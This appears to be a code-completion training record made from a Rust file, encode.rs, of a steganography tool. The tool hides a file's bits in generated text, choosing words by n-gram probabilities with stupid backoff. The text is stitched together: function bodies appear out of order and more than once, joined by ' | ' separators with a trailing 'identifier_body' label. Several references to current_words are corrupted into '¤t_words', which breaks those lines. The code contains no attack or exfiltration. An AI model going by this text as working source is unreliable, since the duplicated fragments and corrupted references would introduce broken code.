_ => {
grams = text.split_whitespace().ngrams(n_down).collect();
}
}
for v in grams {
if n_down == 1 {
total_words += 1;
}
if let Some(val) = hash.get_mut(&v) {
*val += 1;
} else {
if n_down == 1 {
unique_words.push(v[0]);
// if we are on the last n-depth (n == 1),
// that means the vectors only contain one word.
// if the hash does not have this vector of one word yet, then
// this is the first time we are seeing it, so we will add it to
// a vector of unique words.
}
hash.insert(v, 1);
// if the hash does not have this vector yet, add it
// with occurance 1, and next time we see this vector,
// increment the occurance
}
}
n_down -= 1;
}
(hash, unique_words, total_words)
}
pub fn get_restricted_chars(char_map: &HashMap<char, usize>, gib_word: &String) -> Vec<char> {
let mut restricted_chars = vec![];
for key in char_map.keys() {
restricted_chars.push(*key);
}
let word_chars: Vec<char> = gib_word.chars().collect();
for c in word_chars {
if restricted_chars.contains(&c) {
let char_index = restricted_chars.iter().position(|&r| r == c).unwrap();
restricted_chars.remove(char_index);
}
}
restricted_chars
}
pub fn can_use_word(word: &str, good_chars: &Vec<char>, restricted_chars: &Vec<char>) -> bool {
let word_chars: Vec<char> = word.chars().collect();
let mut good_chars_used = vec![0; good_chars.len()];
for c in word_chars {
if restricted_chars.contains(&c) {
return false;
}
if good_chars.contains(&c) {
let char_index = good_chars.iter().position(|&r| r == c).unwrap();
good_chars_used[char_index] += 1;
}
}
for i in good_chars_used {
if i == 0 {
return false;
}
}
true
}
pub fn get_initial_words<'a>(hashmap: &'a HashMap<Vec<&str>, usize>, n: usize) -> Vec<&'a str> {
let mut vecs_with_n_items = vec![];
for key in hashmap.keys() {
if key.len() == n {
vecs_with_n_items.push(key);
}
}
let mut count_hash = HashMap::new();
for vec in vecs_with_n_items {
let mut n_minus_1_slice = vec![];
let mut counter = 1;
for word in vec {
if counter < n {
n_minus_1_slice.push(*word);
} else {
break;
}
counter += 1;
}
if let Some(val) = count_hash.get_mut(&n_minus_1_slice) {
*val += 1;
} else {
count_hash.insert(n_minus_1_slice, 1);
}
}
let mut best_vec_count = 0;
let mut best_vec = vec![];
for vec in count_hash.keys() {
let vec_count = count_hash.get(vec).unwrap();
if vec_count > &best_vec_count {
best_vec_count = *vec_count;
best_vec = vec.to_vec();
}
}
best_vec
}
pub fn get_probability_of(word: &str, given: &Vec<&str>, hashmap: &HashMap<Vec<&str>, usize>, num_words: f64) -> f64 {
let count_of_given = match given.len() {
0 => num_words,
_ => {
if let Some(count) = hashmap.get(given) {
*count as f64
} else {
return 0.0;
}
},
};
let mut word_vec = given.clone();
word_vec.push(word);
let count_of_sequence = if let Some(count) = hashmap.get(&word_vec) {
*count as f64
} else {
return 0.0;
};
count_of_sequence / count_of_given
}
pub fn get_best_word<'a>(
gram: &HashMap<Vec<&str>, usize>,
usable_words: &Vec<&'a str>,
current_words: &Vec<&str>,
n: usize,
total_words: f64,
) -> (&'a str, usize) {
let mut all_p_zero = true;
let mut use_n = n;
let mut max_p_index = 0;
while all_p_zero {
let mut ngram_slice = vec![];
let mut counter = 1;
for word in current_words.iter().rev() {
if counter < use_n {
ngram_slice.push(*word);
}
counter += 1;
}
ngram_slice.reverse();
let last_word = ngram_slice.last().unwrap();
let mut max_p = 0.0;
max_p_index = 0;
for i in 0..usable_words.len() {
let w = &usable_words[i];
if w == last_word {
continue;
}
let p = get_probability_of(w, &ngram_slice, gram, total_words);
// let p = get_interpolated_probability(w, &ngram_slice, gram, total_words);
// println!("P({} | {:?}) = {}", w, ngram_slice, p);
if p > max_p {
all_p_zero = false;
max_p_index = i;
max_p = p;
}
}
if all_p_zero {
use_n -= 1;
}
// comment this if using interpolation
if use_n == 1 {
// no point in picking the word that appears the most...
// take our chances and break, and pick a random word from the list.
// println!("reached bottom of use n!");
break;
}
}
use_n -= 1;
if use_n == 0 {
let mut rng = rand::thread_rng();
max_p_index = rng.gen_range(0, usable_words.len());
}
(usable_words[max_p_index], use_n)
}
pub fn wordify(
gram: &HashMap<Vec<&str>, usize>,
n: usize,
file_words: Vec<String>,
rng: &mut StdRng,
bit_to_char_map: &mut HashMap<usize, char>,
unique_words: &Vec<&str>,
total_words: f64,
consecutive_skips: usize,
depth_skip_threshold: usize,
use_shuffle: bool,
) -> Result<String, String> {
let mut char_to_bit_map = HashMap::new();
let mut num_bits = 0;
for bit_val in bit_to_char_map.keys() {
num_bits += 1;
char_to_bit_map.insert(*bit_to_char_map.get(&bit_val).unwrap(), *bit_val);
}
num_bits -= 1;
// let num_words = unique_words.len();
let mut succ_count = 0;
let mut fail_count = 0;
let mut skip_count = 0;
let mut n_gram_used = vec![0; n];
let mut text_data = String::from("");
let mut current_words = get_initial_words(gram, n);
let mut i = 0;
let mut consecutive_skips_used = 0;
let mut skip_words = vec![];
if !use_shuffle {
for w in unique_words {
if utils::is_skip_word(w, &char_to_bit_map) {
skip_words.push(*w);
}
}
// if not shuffling, skip words get filled in once before
// iterating.
}
while i < file_words.len() {
let gibberish_word = &file_words[i];
let mut used_skip_word = false;
let mut use_keys = vec![];
for key in char_to_bit_map.keys() {
use_keys.push(*key);
}
let restricted_chars = get_restricted_chars(&char_to_bit_map, gibberish_word);
let mut usable_words = vec![];
if use_shuffle {
skip_words = vec![];
// if shuffling the bit to char map,
// we have to reset the skip words every time because they might
// be different
}
// let mut value_num_list = vec![0; max_value];
for w in unique_words {
// let word_val = get_value_from_word(w, char_value_map, max_value);
// // println!("value for {}: {}", w, get_value_from_word(w, char_value_map, 2));
// value_num_list[word_val] += 1;
if use_shuffle && utils::is_skip_word(w, &char_to_bit_map) {
skip_words.push(*w);
}
if can_use_word(w, &gibberish_word.chars().collect(), &restricted_chars) {
usable_words.push(*w);
}
}
match usable_words.len() {
0 => {
fail_count += 1;
text_data.push_str(&gibberish_word);
text_data.push_str(" ");
current_words.push(".");
consecutive_skips_used = 0;
// if there are NO usable words at all then we 'failed'
// to encode this word. we push the gibberish word as is to
// the text data output because we still need to be able to decode it.
// we add a . to current words to stimulate the ngram probability
// for the next word.
},
1 => {
succ_count += 1;
let best_word = &usable_words[0];
text_data.push_str(best_word);
current_words.push(best_word);
text_data.push_str(" ");
n_gram_used[0] += 1;
consecutive_skips_used = 0;
// there is only one usable word, so use it without
// estimating any probabilities. ngram used a depth
// of 0 since we are not evaluating ngrams here.
},
_ => {
let (best_word, n_used) = get_best_word(
gram,
&usable_words,
¤t_words,
n,
total_words,
);
// user can fine-tune the quality of the text output using depth_skip_threshold
// and consecutive skips allowed. The higher both are, the more skip words are used
// which can potentially make the output look more like real text, at the
// expense of encoding less bits per word on average.
// consecutive skips used sets a limit to this such that it forces
// the program to eventually encode a word, otherwise it might
// loop forever in certain situations.
// depth skip threshold allows user to say which n-depths are acceptable.
// lower n-depths produce less realistic.
if n_used <= depth_skip_threshold && consecutive_skips_used < consecutive_skips && skip_words.len() > 0 {
let (best_word2, n_used2) = get_best_word(
gram,
&skip_words,
¤t_words,
n,
total_words
);
n_gram_used[n_used2] += 1;
current_words.push(best_word2);
text_data.push_str(best_word2);
text_data.push_str(" ");
skip_count += 1;
used_skip_word = true;
consecutive_skips_used += 1;
i -= 1;
// we used a skip word, make sure to keep i at its current
// level so that we try to encode this word again
} else {
succ_count += 1;
n_gram_used[n_used] += 1;
text_data.push_str(best_word);
current_words.push(best_word);
text_data.push_str(" ");
consecutive_skips_used = 0;
// if not using a skip word, we encoded the best possible word according
// to ngrams. add the best word to the text output, as well as the current
// words vec which is used to determine word probabilities for the next
// iteration
}
}
};
if !used_skip_word && use_shuffle {
// only shuffle the bit to char map if we encoded a word
// if we used a skip word, we do NOT want to shuffle as we
// will not be able to properly decode
utils::fill_bit_to_char_map(rng, bit_to_char_map);
char_to_bit_map = utils::make_char_to_bit_map(bit_to_char_map);
}
i += 1;
}
text_data.pop(); // remove trailing space
let num_bytes = (file_words.len() * num_bits) / 8;
// print summary
println!("\nencoding using {} bits per word. file had {} bytes, ie: {} words to wordify", num_bits, num_bytes, file_words.len());
println!("succesfully filled {} words", (succ_count + skip_count));
println!("of the {} words, {} were skip words", (succ_count + skip_count), skip_count);
println!("failed to find a word {} times", fail_count);
println!("average bits per word: {}\n", ((num_bytes * 8) as f64 / (succ_count + skip_count) as f64));
println!("\nN-depth summary: {:?}", n_gram_used);
Ok(text_data)
}
pub fn get_value_vec_from_char_value_mode(
file_contents: &Vec<u8>,
num_bits: usize,
use_shuffle: bool,
rng: &mut StdRng,
char_to_value_map: &mut HashMap<char, usize>,
) -> Vec<u8> {
let mut cursor = Cursor::new(&file_contents);
let mut num_bits_remain = file_contents.len() * 8;
let mut bitreader = BitReader::endian(&mut cursor, BigEndian);
let mut value_vec = vec![];
while num_bits_remain > 0 {
let num_bits_to_read = if num_bits_remain < num_bits as usize {
num_bits_remain as u32
} else {
num_bits as u32
};
let value: u8 = bitreader.read(num_bits_to_read).unwrap();
if use_shuffle {
utils::shuffle_char_value_map(rng, char_to_value_map);
}
value_vec.push(value);
num_bits_remain -= num_bits_to_read as usize;
}
value_vec
}
pub fn get_value_vec(
bit_to_char_map: &mut HashMap<usize, char>,
file_contents: &Vec<u8>,
num_bits: usize,
use_shuffle: bool,
rng: &mut StdRng,
) -> Vec<String> |
pub fn wordify_from_char_value_mode(
gram: &HashMap<Vec<&str>, usize>,
char_to_value_map: &mut HashMap<char, usize>,
n: usize,
file_values: Vec<u8>,
num_bits: usize,
unique_words: &Vec<&str>,
total_words: f64,
use_shuffle: bool,
value_mode: utils::ValueMode,
rng: &mut StdRng,
) -> Result<String, String> {
let mut succ_count = 0;
let mut n_gram_used = vec![0; n];
let mut text_data = String::from("");
let mut current_words = get_initial_words(gram, n);
let mut i = 0;
while i < file_values.len() {
let current_val = file_values[i];
let mut usable_words = vec![];
for w in unique_words {
if *w == "." || *w == "," || *w == "?" || *w == ";" || *w == "!" {
// dont use punctuation in char_value mode because
// punctuation isnt ignored by the decoder. if you want
// to leave punctuation in, you would also have to leave
// the spaces around them which would result in a stego text
// like: he likes cars , toys , and trucks .
// for that reason, I chose to ignore punctuation
continue;
}
let w_val = utils::get_value_from_chars(w, &char_to_value_map, &value_mode);
if w_val == current_val as usize {
usable_words.push(*w);
}
}
match usable_words.len() {
0 => {
panic!("NOT ENOUGH WORDS WITH VALUE {}", current_val);
},
1 => {
succ_count += 1;
let best_word = &usable_words[0];
text_data.push_str(best_word);
current_words.push(best_word);
text_data.push_str(" ");
n_gram_used[0] += 1;
},
_ => {
let (best_word, n_used) = get_best_word(
gram,
&usable_words,
¤t_words,
n,
total_words,
);
succ_count += 1;
n_gram_used[n_used] += 1;
text_data.push_str(best_word);
current_words.push(best_word);
text_data.push_str(" ");
}
};
if use_shuffle {
utils::shuffle_char_value_map(rng, char_to_value_map);
}
i += 1;
}
text_data.pop(); // remove trailing space
let num_bytes = (file_values.len() * num_bits) / 8;
// print summary
println!("\nencoding using {} bits per word. file had {} bytes, ie: {} words to wordify", num_bits, num_bytes, file_values.len());
println!("succesfully filled {} words", succ_count);
println!("average bits per word: {}\n", ((num_bytes * 8) as f64 / succ_count as f64));
println!("\nN-depth summary: {:?}", n_gram_used);
Ok(text_data)
}
pub fn encode_char_bit_map(
file: &str,
output: &str,
seed_str: &str,
word_file_name: &str,
n_depth: usize,
consecutive_skips: usize,
depth_skip_threshold: usize,
num_bits: usize,
use_shuffle: bool,
) -> Result<(), String> {
let mut rng = utils::create_rng_from_seed(seed_str);
let mut original_rng = utils::create_rng_from_seed(seed_str);
let contents = utils::get_file_contents(file)?;
let mut word_file_data = utils::get_file_contents_as_string(word_file_name)?;
let mut bit_to_char_map = utils::make_bit_to_char_map(num_bits);
let mut original_bit_to_char_map = bit_to_char_map.clone();
utils::fill_bit_to_char_map(&mut rng, &mut bit_to_char_map);
utils::fill_bit_to_char_map(&mut original_rng, &mut original_bit_to_char_map);
let value_vec = get_value_vec(&mut bit_to_char_map, &contents, num_bits, use_shuffle, &mut rng);
word_file_data = word_file_data.to_lowercase();
word_file_data = utils::format_text_for_ngrams(&word_file_data);
let (
gram_hash,
unique_words,
total_words,
) = generate_ngrams(&word_file_data, n_depth);
let text_data = wordify(
&gram_hash,
n_depth,
value_vec,
&mut original_rng,
&mut original_bit_to_char_map,
&unique_words,
total_words as f64,
consecutive_skips,
depth_skip_threshold,
use_shuffle,
)?;
fs::write(output, text_data).unwrap();
Ok(())
}
pub fn encode_char_value_map(
file: &str,
output: &str,
seed_str: &str,
word_file_name: &str,
n_depth: usize,
consecutive_skips: usize,
depth_skip_threshold: usize,
num_bits: usize,
use_shuffle: bool,
value_mode: utils::ValueMode,
) -> Result<(), String> {
let mut rng = utils::create_rng_from_seed(seed_str);
let mut original_rng = utils::create_rng_from_seed(seed_str);
let contents = utils::get_file_contents(file)?;
let mut word_file_data = utils::get_file_contents_as_string(word_file_name)?;
let mut char_to_value_map = utils::make_char_to_value_map(num_bits);
let mut original_char_to_value_map = char_to_value_map.clone();
utils::shuffle_char_value_map(&mut rng, &mut char_to_value_map);
utils::shuffle_char_value_map(&mut original_rng, &mut original_char_to_value_map);
// panic!("dsa");
let mut value_vec = get_value_vec_from_char_value_mode(
&contents,
num_bits,
use_shuffle,
&mut rng,
&mut char_to_value_map,
);
word_file_data = word_file_data.to_lowercase();
word_file_data = utils::format_text_for_ngrams(&word_file_data);
let (
gram_hash,
unique_words,
total_words,
) = generate_ngrams(&word_file_data, n_depth);
let text_data = wordify_from_char_value_mode(
&gram_hash,
&mut original_char_to_value_map,
n_depth,
value_vec,
num_bits,
&unique_words,
total_words as f64,
use_shuffle,
value_mode,
&mut original_rng,
)?;
fs::write(output, text_data).unwrap();
Ok(())
}
pub fn encode(matches: &ArgMatches) -> Result<(), String> {
let file = utils::get_value(matches, "file")?;
let output = utils::get_value(matches, "output")?;
let mut seed_str = utils::get_value(matches, "seed")?;
let password_str = utils::get_value(matches, "password")?;
let alg_str = utils::get_value(matches, "algorithm")?;
let word_file_name = utils::get_value(matches, "words")?;
let n_depth = utils::get_numerical_value(matches, "n")?;
let consecutive_skips = utils::get_numerical_value(matches, "consecutive_skips")?;
let depth_skip_threshold = utils::get_numerical_value(matches, "depth_skip")?;
let num_bits = utils::get_numerical_value(matches, "bits")?;
if num_bits > 8 || num_bits < 1 {
return Err(format!("Bits must be between 1 and 8 inclusively, you provided {}", num_bits));
}
let pass;
match password_str {
"true" => {
// get seed string interactively
pass = rpassword::prompt_password_stderr("Enter password: ").unwrap();
seed_str = pass.as_str();
},
_ => (),
};
let alg = utils::get_algorithm_from_string(alg_str, num_bits)?;
let (use_shuffle, value_mode) = match alg {
utils::Algorithm::Shuffle(mode) => {
(true, mode)
},
utils::Algorithm::NoShuffle(mode) => {
(false, mode)
},
};
match value_mode {
utils::ValueMode::CharBitMap => {
encode_char_bit_map(
file,
output,
seed_str,
word_file_name,
n_depth,
consecutive_skips,
depth_skip_threshold,
num_bits,
use_shuffle,
)
},
utils::ValueMode::CharValueMap(val) => {
encode_char_value_map(
file,
output,
seed_str,
word_file_name,
n_depth,
consecutive_skips,
depth_skip_threshold,
num_bits,
use_shuffle,
value_mode,
)
},
}
} | {
let mut cursor = Cursor::new(&file_contents);
let mut num_bits_remain = file_contents.len() * 8;
let mut bitreader = BitReader::endian(&mut cursor, BigEndian);
let mut sorted_keys = vec![];
let mut value_vec = vec![];
for byte_val in bit_to_char_map.keys() {
sorted_keys.push(*byte_val);
}
sorted_keys.sort_by(|a, b| b.cmp(a));
// sort keys once so you dont need to do it in the iteration.
// the bit to char map maps bit positions: (0, 1, 2, 4, 8, 16, 32, etc)
// to characters. we iterate over the bit position values, and push the value
// to a sorted_keys vec, and then sort in descending order
// (ie: 0th element is largest)
// we do this because the user provides the number of bits.
// so if the user says number
// of bits is 3, then the sorted keys will look like: [4, 2, 1, 0]
while num_bits_remain > 0 {
let num_bits_to_read = if num_bits_remain < num_bits as usize {
num_bits_remain as u32
} else {
num_bits as u32
};
let value: u8 = bitreader.read(num_bits_to_read).unwrap();
let char_str = utils::get_chars_from_value(value, bit_to_char_map, &sorted_keys);
if use_shuffle {
utils::fill_bit_to_char_map(rng, bit_to_char_map);
}
value_vec.push(char_str);
num_bits_remain -= num_bits_to_read as usize;
}
// iterate the file that you wish to encode, reading num_bits at a time.
// for each value you read, generate characters that map to the value using the bit to char map
// if using shuffle, the bit to char map gets shuffled according to a seeded rng.
// at the end you have a vector of gibberish strings that you will try to hide
// in words using ngrams.
value_vec
} | identifier_body |
encode.rs | use std::fs;
use std::io::{Cursor};
use std::collections::HashMap;
use clap::ArgMatches;
use rand::{Rng, prelude::StdRng};
use bitstream_io::{BigEndian, BitReader};
use ngrams::Ngram;
use rpassword;
use super::utils;
pub fn generate_ngrams<'a>(text: &'a String, n: usize) -> (HashMap<Vec<&str>, usize>, Vec<&str>, usize) {
let mut n_down = n;
let mut hash: HashMap<Vec<&str>, usize> = HashMap::new();
let mut unique_words: Vec<&str> = vec![];
let mut total_words = 0;
while n_down > 0 {
// we wish to generate a hash map that contains n-grams for each value of n
// from the user provided n, down to n == 1. this allows us to do a 'stupid backoff'
// if there is not enough data at a certain n-depth for a certain word, we can
// keep backing off to n - 1 until we find enough data to make a decision on which
// word to use. (or until we hit n == 1, in which case we pick a random word).
let mut grams: Vec<Vec<&str>> = vec![];
match n_down {
1 => {
for t in text.split_whitespace() {
grams.push(vec![t]);
}
// for some reason the ngrams crate has difficulty when n == 1,
// so in this case we generate the n gram ourselves by a simple whitespace
// delimiter.
},
_ => {
grams = text.split_whitespace().ngrams(n_down).collect();
}
}
for v in grams {
if n_down == 1 {
total_words += 1;
}
if let Some(val) = hash.get_mut(&v) {
*val += 1;
} else {
if n_down == 1 {
unique_words.push(v[0]);
// if we are on the last n-depth (n == 1),
// that means the vectors only contain one word.
// if the hash does not have this vector of one word yet, then
// this is the first time we are seeing it, so we will add it to
// a vector of unique words.
}
hash.insert(v, 1);
// if the hash does not have this vector yet, add it
// with occurance 1, and next time we see this vector,
// increment the occurance
}
}
n_down -= 1;
}
(hash, unique_words, total_words)
}
pub fn get_restricted_chars(char_map: &HashMap<char, usize>, gib_word: &String) -> Vec<char> {
let mut restricted_chars = vec![];
for key in char_map.keys() {
restricted_chars.push(*key);
}
let word_chars: Vec<char> = gib_word.chars().collect();
for c in word_chars {
if restricted_chars.contains(&c) {
let char_index = restricted_chars.iter().position(|&r| r == c).unwrap();
restricted_chars.remove(char_index);
}
}
restricted_chars
}
pub fn can_use_word(word: &str, good_chars: &Vec<char>, restricted_chars: &Vec<char>) -> bool {
let word_chars: Vec<char> = word.chars().collect();
let mut good_chars_used = vec![0; good_chars.len()];
for c in word_chars {
if restricted_chars.contains(&c) {
return false;
}
if good_chars.contains(&c) {
let char_index = good_chars.iter().position(|&r| r == c).unwrap();
good_chars_used[char_index] += 1;
}
}
for i in good_chars_used {
if i == 0 {
return false;
}
}
true
}
pub fn get_initial_words<'a>(hashmap: &'a HashMap<Vec<&str>, usize>, n: usize) -> Vec<&'a str> {
let mut vecs_with_n_items = vec![];
for key in hashmap.keys() {
if key.len() == n {
vecs_with_n_items.push(key);
}
}
let mut count_hash = HashMap::new();
for vec in vecs_with_n_items {
let mut n_minus_1_slice = vec![];
let mut counter = 1;
for word in vec {
if counter < n {
n_minus_1_slice.push(*word);
} else {
break;
}
counter += 1;
}
if let Some(val) = count_hash.get_mut(&n_minus_1_slice) {
*val += 1;
} else {
count_hash.insert(n_minus_1_slice, 1);
}
}
let mut best_vec_count = 0;
let mut best_vec = vec![];
for vec in count_hash.keys() {
let vec_count = count_hash.get(vec).unwrap();
if vec_count > &best_vec_count {
best_vec_count = *vec_count;
best_vec = vec.to_vec();
}
}
best_vec
}
pub fn get_probability_of(word: &str, given: &Vec<&str>, hashmap: &HashMap<Vec<&str>, usize>, num_words: f64) -> f64 {
let count_of_given = match given.len() {
0 => num_words,
_ => {
if let Some(count) = hashmap.get(given) {
*count as f64
} else {
return 0.0;
}
},
};
let mut word_vec = given.clone();
word_vec.push(word);
let count_of_sequence = if let Some(count) = hashmap.get(&word_vec) {
*count as f64
} else {
return 0.0;
};
count_of_sequence / count_of_given
}
pub fn get_best_word<'a>(
gram: &HashMap<Vec<&str>, usize>,
usable_words: &Vec<&'a str>,
current_words: &Vec<&str>,
n: usize,
total_words: f64,
) -> (&'a str, usize) {
let mut all_p_zero = true;
let mut use_n = n;
let mut max_p_index = 0;
while all_p_zero {
let mut ngram_slice = vec![];
let mut counter = 1;
for word in current_words.iter().rev() {
if counter < use_n {
ngram_slice.push(*word);
}
counter += 1;
}
ngram_slice.reverse();
let last_word = ngram_slice.last().unwrap();
let mut max_p = 0.0;
max_p_index = 0;
for i in 0..usable_words.len() {
let w = &usable_words[i];
if w == last_word {
continue;
}
let p = get_probability_of(w, &ngram_slice, gram, total_words);
// let p = get_interpolated_probability(w, &ngram_slice, gram, total_words);
// println!("P({} | {:?}) = {}", w, ngram_slice, p);
if p > max_p {
all_p_zero = false;
max_p_index = i;
max_p = p;
}
}
if all_p_zero {
use_n -= 1;
}
// comment this if using interpolation
if use_n == 1 {
// no point in picking the word that appears the most...
// take our chances and break, and pick a random word from the list.
// println!("reached bottom of use n!");
break;
}
}
use_n -= 1;
if use_n == 0 {
let mut rng = rand::thread_rng();
max_p_index = rng.gen_range(0, usable_words.len());
}
(usable_words[max_p_index], use_n)
}
pub fn wordify(
gram: &HashMap<Vec<&str>, usize>,
n: usize,
file_words: Vec<String>,
rng: &mut StdRng,
bit_to_char_map: &mut HashMap<usize, char>,
unique_words: &Vec<&str>,
total_words: f64,
consecutive_skips: usize,
depth_skip_threshold: usize,
use_shuffle: bool,
) -> Result<String, String> {
let mut char_to_bit_map = HashMap::new();
let mut num_bits = 0;
for bit_val in bit_to_char_map.keys() {
num_bits += 1;
char_to_bit_map.insert(*bit_to_char_map.get(&bit_val).unwrap(), *bit_val);
}
num_bits -= 1;
// let num_words = unique_words.len();
let mut succ_count = 0;
let mut fail_count = 0;
let mut skip_count = 0;
let mut n_gram_used = vec![0; n];
let mut text_data = String::from("");
let mut current_words = get_initial_words(gram, n);
let mut i = 0;
let mut consecutive_skips_used = 0;
let mut skip_words = vec![];
if !use_shuffle {
for w in unique_words {
if utils::is_skip_word(w, &char_to_bit_map) {
skip_words.push(*w);
}
}
// if not shuffling, skip words get filled in once before
// iterating.
}
while i < file_words.len() {
let gibberish_word = &file_words[i];
let mut used_skip_word = false;
let mut use_keys = vec![];
for key in char_to_bit_map.keys() {
use_keys.push(*key);
}
let restricted_chars = get_restricted_chars(&char_to_bit_map, gibberish_word);
let mut usable_words = vec![];
if use_shuffle {
skip_words = vec![];
// if shuffling the bit to char map,
// we have to reset the skip words every time because they might
// be different
}
// let mut value_num_list = vec![0; max_value];
for w in unique_words {
// let word_val = get_value_from_word(w, char_value_map, max_value);
// // println!("value for {}: {}", w, get_value_from_word(w, char_value_map, 2));
// value_num_list[word_val] += 1;
if use_shuffle && utils::is_skip_word(w, &char_to_bit_map) {
skip_words.push(*w);
}
if can_use_word(w, &gibberish_word.chars().collect(), &restricted_chars) {
usable_words.push(*w);
}
}
match usable_words.len() {
0 => {
fail_count += 1;
text_data.push_str(&gibberish_word);
text_data.push_str(" ");
current_words.push(".");
consecutive_skips_used = 0;
// if there are NO usable words at all then we 'failed'
// to encode this word. we push the gibberish word as is to
// the text data output because we still need to be able to decode it.
// we add a . to current words to stimulate the ngram probability
// for the next word.
},
1 => {
succ_count += 1;
let best_word = &usable_words[0];
text_data.push_str(best_word);
current_words.push(best_word);
text_data.push_str(" ");
n_gram_used[0] += 1;
consecutive_skips_used = 0;
// there is only one usable word, so use it without
// estimating any probabilities. ngram used a depth
// of 0 since we are not evaluating ngrams here.
},
_ => {
let (best_word, n_used) = get_best_word(
gram,
&usable_words,
¤t_words,
n,
total_words,
);
// user can fine-tune the quality of the text output using depth_skip_threshold
// and consecutive skips allowed. The higher both are, the more skip words are used
// which can potentially make the output look more like real text, at the
// expense of encoding less bits per word on average.
// consecutive skips used sets a limit to this such that it forces
// the program to eventually encode a word, otherwise it might
// loop forever in certain situations.
// depth skip threshold allows user to say which n-depths are acceptable.
// lower n-depths produce less realistic.
if n_used <= depth_skip_threshold && consecutive_skips_used < consecutive_skips && skip_words.len() > 0 {
let (best_word2, n_used2) = get_best_word(
gram,
&skip_words,
¤t_words,
n,
total_words
);
n_gram_used[n_used2] += 1;
current_words.push(best_word2);
text_data.push_str(best_word2);
text_data.push_str(" ");
skip_count += 1;
used_skip_word = true;
consecutive_skips_used += 1;
i -= 1;
// we used a skip word, make sure to keep i at its current
// level so that we try to encode this word again
} else {
succ_count += 1;
n_gram_used[n_used] += 1;
text_data.push_str(best_word);
current_words.push(best_word);
text_data.push_str(" ");
consecutive_skips_used = 0;
// if not using a skip word, we encoded the best possible word according
// to ngrams. add the best word to the text output, as well as the current
// words vec which is used to determine word probabilities for the next
// iteration
}
}
};
if !used_skip_word && use_shuffle {
// only shuffle the bit to char map if we encoded a word
// if we used a skip word, we do NOT want to shuffle as we
// will not be able to properly decode
utils::fill_bit_to_char_map(rng, bit_to_char_map);
char_to_bit_map = utils::make_char_to_bit_map(bit_to_char_map);
}
i += 1;
}
text_data.pop(); // remove trailing space
let num_bytes = (file_words.len() * num_bits) / 8;
// print summary
println!("\nencoding using {} bits per word. file had {} bytes, ie: {} words to wordify", num_bits, num_bytes, file_words.len());
println!("succesfully filled {} words", (succ_count + skip_count));
println!("of the {} words, {} were skip words", (succ_count + skip_count), skip_count);
println!("failed to find a word {} times", fail_count);
println!("average bits per word: {}\n", ((num_bytes * 8) as f64 / (succ_count + skip_count) as f64));
println!("\nN-depth summary: {:?}", n_gram_used);
Ok(text_data)
}
pub fn get_value_vec_from_char_value_mode(
file_contents: &Vec<u8>,
num_bits: usize, | let mut cursor = Cursor::new(&file_contents);
let mut num_bits_remain = file_contents.len() * 8;
let mut bitreader = BitReader::endian(&mut cursor, BigEndian);
let mut value_vec = vec![];
while num_bits_remain > 0 {
let num_bits_to_read = if num_bits_remain < num_bits as usize {
num_bits_remain as u32
} else {
num_bits as u32
};
let value: u8 = bitreader.read(num_bits_to_read).unwrap();
if use_shuffle {
utils::shuffle_char_value_map(rng, char_to_value_map);
}
value_vec.push(value);
num_bits_remain -= num_bits_to_read as usize;
}
value_vec
}
pub fn get_value_vec(
bit_to_char_map: &mut HashMap<usize, char>,
file_contents: &Vec<u8>,
num_bits: usize,
use_shuffle: bool,
rng: &mut StdRng,
) -> Vec<String> {
let mut cursor = Cursor::new(&file_contents);
let mut num_bits_remain = file_contents.len() * 8;
let mut bitreader = BitReader::endian(&mut cursor, BigEndian);
let mut sorted_keys = vec![];
let mut value_vec = vec![];
for byte_val in bit_to_char_map.keys() {
sorted_keys.push(*byte_val);
}
sorted_keys.sort_by(|a, b| b.cmp(a));
// sort keys once so you dont need to do it in the iteration.
// the bit to char map maps bit positions: (0, 1, 2, 4, 8, 16, 32, etc)
// to characters. we iterate over the bit position values, and push the value
// to a sorted_keys vec, and then sort in descending order
// (ie: 0th element is largest)
// we do this because the user provides the number of bits.
// so if the user says number
// of bits is 3, then the sorted keys will look like: [4, 2, 1, 0]
while num_bits_remain > 0 {
let num_bits_to_read = if num_bits_remain < num_bits as usize {
num_bits_remain as u32
} else {
num_bits as u32
};
let value: u8 = bitreader.read(num_bits_to_read).unwrap();
let char_str = utils::get_chars_from_value(value, bit_to_char_map, &sorted_keys);
if use_shuffle {
utils::fill_bit_to_char_map(rng, bit_to_char_map);
}
value_vec.push(char_str);
num_bits_remain -= num_bits_to_read as usize;
}
// iterate the file that you wish to encode, reading num_bits at a time.
// for each value you read, generate characters that map to the value using the bit to char map
// if using shuffle, the bit to char map gets shuffled according to a seeded rng.
// at the end you have a vector of gibberish strings that you will try to hide
// in words using ngrams.
value_vec
}
pub fn wordify_from_char_value_mode(
gram: &HashMap<Vec<&str>, usize>,
char_to_value_map: &mut HashMap<char, usize>,
n: usize,
file_values: Vec<u8>,
num_bits: usize,
unique_words: &Vec<&str>,
total_words: f64,
use_shuffle: bool,
value_mode: utils::ValueMode,
rng: &mut StdRng,
) -> Result<String, String> {
let mut succ_count = 0;
let mut n_gram_used = vec![0; n];
let mut text_data = String::from("");
let mut current_words = get_initial_words(gram, n);
let mut i = 0;
while i < file_values.len() {
let current_val = file_values[i];
let mut usable_words = vec![];
for w in unique_words {
if *w == "." || *w == "," || *w == "?" || *w == ";" || *w == "!" {
// dont use punctuation in char_value mode because
// punctuation isnt ignored by the decoder. if you want
// to leave punctuation in, you would also have to leave
// the spaces around them which would result in a stego text
// like: he likes cars , toys , and trucks .
// for that reason, I chose to ignore punctuation
continue;
}
let w_val = utils::get_value_from_chars(w, &char_to_value_map, &value_mode);
if w_val == current_val as usize {
usable_words.push(*w);
}
}
match usable_words.len() {
0 => {
panic!("NOT ENOUGH WORDS WITH VALUE {}", current_val);
},
1 => {
succ_count += 1;
let best_word = &usable_words[0];
text_data.push_str(best_word);
current_words.push(best_word);
text_data.push_str(" ");
n_gram_used[0] += 1;
},
_ => {
let (best_word, n_used) = get_best_word(
gram,
&usable_words,
¤t_words,
n,
total_words,
);
succ_count += 1;
n_gram_used[n_used] += 1;
text_data.push_str(best_word);
current_words.push(best_word);
text_data.push_str(" ");
}
};
if use_shuffle {
utils::shuffle_char_value_map(rng, char_to_value_map);
}
i += 1;
}
text_data.pop(); // remove trailing space
let num_bytes = (file_values.len() * num_bits) / 8;
// print summary
println!("\nencoding using {} bits per word. file had {} bytes, ie: {} words to wordify", num_bits, num_bytes, file_values.len());
println!("succesfully filled {} words", succ_count);
println!("average bits per word: {}\n", ((num_bytes * 8) as f64 / succ_count as f64));
println!("\nN-depth summary: {:?}", n_gram_used);
Ok(text_data)
}
pub fn encode_char_bit_map(
file: &str,
output: &str,
seed_str: &str,
word_file_name: &str,
